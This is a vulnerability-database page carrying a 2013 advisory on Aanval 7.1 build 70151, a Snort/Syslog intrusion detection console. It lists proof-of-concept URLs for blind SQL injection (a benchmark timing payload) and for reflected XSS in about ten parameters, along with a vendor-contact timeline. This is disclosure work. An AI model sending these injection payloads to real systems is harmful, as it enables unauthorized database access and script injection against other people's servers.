Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Aanval 7.1 build 70151 - Multiple Vulnerabilities

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 27 Views

Aanval 7.1 build 70151 - Multiple Vulnerabilities in Comprehensive Intrusion Detection Consol

Code

                                                -----------
Author:
-----------

xistence < xistence[at]0x90[.]nl >

-------------------------
Affected products:
-------------------------

Aanval 7.1 build 70151

-------------------------
Affected vendors:
-------------------------

Aanval
http://www.aanval.com/
https://www.aanval.com/download/pickup

-------------------------
Product description:
-------------------------

Aanval is the industry's most comprehensive Snort and Syslog Intrusion
Detection, Correlation,
and Threat Management console on the market. Aanval supports both Snort and
Suricata,
as well as virtually any Syslog data source, and is designed specifically
to scale from
small-single sensor installations to global enterprise deployments.

Aanval's primary function is to correlate data from multiple sources, bring
together billions of events,
and present users with a holistic view of false-positive free, network
security situational awareness.

----------
Details:
----------

Aanval 7.1 build 70151 is prone to multiple vulnerabilities. Below are the
details.

[ 0x01 - Blind SQL Injection ]

The "id" and "query" parameters are vulnerable to blind SQL injection. The
proof of concept below does a sha1 benchmark on the value "1". This will
take a couple of seconds to process in most situations and thus shows that
the injection works.
http://
<IP>/aanval/?op=prv_myReports&id=2'%20and%20benchmark(20000000%2csha1(1))--%20
http://
<IP>/aanval/?op=prv_eventSearch&query=%20report:'%2bbenchmark(20000000%2csha1(1))%2b'


[ 0x02 - Reflected XSS ]

The following requests are vulnerable to "Cross Site Scripting" and will
show a pop-up with the word "XSS".

http://<IP>/aanval/?op=prv_eventSearch&dip=<script>alert('XSS')</script>
http://<IP>/aanval/?op=prv_eventSearch&dport=%0Aalert('XSS')//
http://<IP>/aanval/?num=<script>alert('XSS')</script>
http://<IP>/aanval/?op=prv_eventSearch&protocol=%0Aalert('XSS')//
http://
<IP>/aanval/?op=prv_eventSearch&query=%20report:31337%0aalert('XSS')//
http://<IP>/aanval/?op=prv_eventSearch&risk=%0Aalert('XSS')//
http://<IP>/aanval/?op=prv_eventSearch&sip=<script>alert('XSS')</script>
http://<IP>/aanval/?op=prv_eventSearch&sport=%0aalert('XSS')//
http://<IP>/aanval/?op=prv_eventSearch&string=<script>alert('XSS')</script>
http://
<IP>/aanval/?op=prv_eventSearchResults&transaction="><script>alert('XSS')</script>

-----------
Solution:
-----------

No fix available, use a good WAF :)

--------------
Timeline:
--------------

2013-08-16 Provided details to Aanval support. Ticket is created.
2013-09-19 Asked for status update.
2013-09-26 No response yet, asked for status update again.
2013-10-04 Still no response, public disclosure.

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
aanval7.170151vulnerabilitiesintrusion detectionsql injectioncross site scriptingsyslogsnortsuricatathreat managementwaf
27